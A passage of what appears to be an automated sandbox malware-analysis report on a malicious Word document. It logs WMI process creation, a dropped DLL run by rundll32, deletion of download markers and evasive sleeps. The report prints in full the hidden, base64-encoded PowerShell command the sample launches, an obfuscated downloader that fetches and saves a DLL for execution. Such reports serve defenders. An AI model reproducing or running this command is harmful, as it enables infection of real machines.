BhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10013BFB

PE file contains an invalid checksum

Source: Yvtlx6p4.dll.5.dr

Static PE information: real checksum: 0x4a297 should be: 0x40b13

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000B0BD push ecx; ret	7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007BCA push ecx; ret	7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BCE92 push cs; retf	8_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ACE92 push cs; retf	11_2_006ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001ECE92 push cs; retf	13_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0068CE92 push cs; retf	15_2_0068CE94

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yffe\xmxs.xtt:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yxkq\vxcyp.vst:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Glql\mritqo.dtl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xlll\midsk.ptl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qpvq\ojxkj.pqe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ljbn\kwuw.ehe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Doth\isebmn.lpx:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
